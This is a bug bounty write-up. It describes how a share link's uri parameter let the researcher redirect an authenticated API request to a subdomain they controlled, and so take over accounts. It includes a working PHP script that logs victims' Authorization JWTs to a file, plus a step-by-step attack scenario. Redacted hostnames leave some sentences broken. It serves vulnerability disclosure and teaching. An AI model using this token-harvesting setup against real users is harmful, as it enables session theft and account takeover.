In the following post, input invalidation caused requests to be manipulated to completely take over any account. There are many different ways to takeover any account, but such a case is rarely observed. The attacker sent input is directly appended on the application-generated API request, which allowed him to modify the request to send to a domain of his control. The vulnerability is described in the below case study, after which there is a Bug Bounty Tip. These tips are generally picked from Twitter by the #bugbountytip in search. Any interesting tip found would undoubtedly be added to the blogs. Please don’t forget to read the Bug Bounty Tip at the end of each post and like, share and subscribe to the Blog.
Case Study: Improper Input Validation -> Account Takeover
The application under test was a three-tier web application – Presentation tier (Front-End/User Interface), Application Tier (Functional Logic), and Data-Tier (Databases). As this was a private program, all illustrations of vulnerabilities will be represented with the host as
The application had a share functionality where a link was generated on clicking. The link had a parameter named uri which accepted endpoint to the resource and, in return, loaded them from client-side.
Request 1: Response: 200 OK Website Data
Request 2 (Website generated Request): GET /items/1 HTTP/1.1 Host: … Authorization Bearer eyj0… … Response: 200 OK … Data of item 1 …
On observing the series of requests, it was seen that the resource loaded was entirely client-side and thus eliminated the option of SSRF. The parameter uri was then fuzzed in an attempt to show the malicious impact.
Request 1: Response: 200 OK Website Data
Request 2 (Website generated Request): OPTIONS /items/1 HTTP/1.1 Host: … Response: HTTP/1.1 204 No Content Connection: close Server: nginx Cache-Control: private, no-store, no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Headers: Authorization, Content-Type, Location, User-Agent …
Request 3 will then be sent to GET /items/1 from
Request 1: Response: 200 OK Website Data
Request 2 (Website generated Request): GET /12/asad HTTP/1.1 Host: … Authorization Bearer eyj0… … Response: HTTP/1.1 200 OK … Data of item 1 …
Third analysis: On entering the value ‘’ in the parameter uri (notice the dot before, it was observed that the request did take the absolute path and sent the OPTIONS request to
Request 1: Response: 200 OK Website Data
Request 2 (Website generated Request): OPTIONS / HTTP/1.1 Host: … Response: HTTP/1.1 200 OK Server generated headers …
Bringing it all together
To exploit this vulnerability, a subdomain was generated. As in the first analysis, we saw that the OPTIONS request sent to the application gave multiple headers in the response, and thus it was needed to be added to the newly made subdomain. Once the subdomain returns the appropriate response headers, a GET request will be made to this path.
The PHP file was generated to set the appropriate headers and code to store data to the log file.
<?php header("Server: nginx"); header("Content-Type: text/html; charset=UTF-8"); header("Cache-Control: private, no-store, no-cache"); header("Access-Control-Allow-Origin: *"); header("Access-Control-Allow-Methods: GET, DELETE, PATCH, OPTIONS"); header("Access-Control-Allow-Headers: Authorization, Content-Type, Location, User-Agent”); header("Allow: GET,DELETE,PATCH,OPTIONS"); //…other headers… $iplogfile = 'logs.html'; $ipaddress = $_SERVER['REMOTE_ADDR']; $webpage = $_SERVER['SCRIPT_NAME']; $timestamp = date('d/m/Y h:i:s'); $browser = $_SERVER['HTTP_USER_AGENT']; $fp = fopen($iplogfile, 'a+'); chmod($iplogfile, 0777); foreach (getallheaders() as $name => $value) { echo "$name: $value"; fwrite($fp, '['.$value.']: '.$ipaddress.' '.$webpage.' '. $value. "\n"); } fclose($fp); ?>
Now on visiting the URL, a GET request was made to with JWT token in the body. The JWT token is then stored in the file logs.html, which the attacker can then access.
Request: GET / HTTP/1.1 Host: … Authorization Bearer: eyj0… …
In possession of the JWT token, the attacker has complete access to the victims’ account and can perform anything on his behalf.
Attack Scenario:
- The attacker crafts the malicious links and hosts the subdomain required to perform the attack
- The attacker now sends the malicious link to the victim. For example:
- The victim visits the link intentionally or unintentionally, and a request is sent from with the victim’s token.
- The token is stored at, which can be used to send a request to and takeover victims account.
- Never accept any input blindly – The processed request can be intercepted and manipulated to chain vulnerabilities.
- Whitelist all input – Any input or special characters added in the parameters or URL should be checked with the whitelisted inputs. If absent, drop the request.
- Fuzz all characters – Fuzzing special characters can produce many unexpected results, so always try this.
- Never give up. The program was a 5-year-old program, and still, a critical bug was found on the website.
That’s all for this Blog. Hope you liked it.
#BugBountyTip: Always check redirect_uri on Oauth login pages. If they belong to third party, they are most likely misconfigured for open redirect and hence account takeover. Try finding open redirects on subdomains in case filter added for *
The vulnerability was found in joint efforts with Verneet Singh.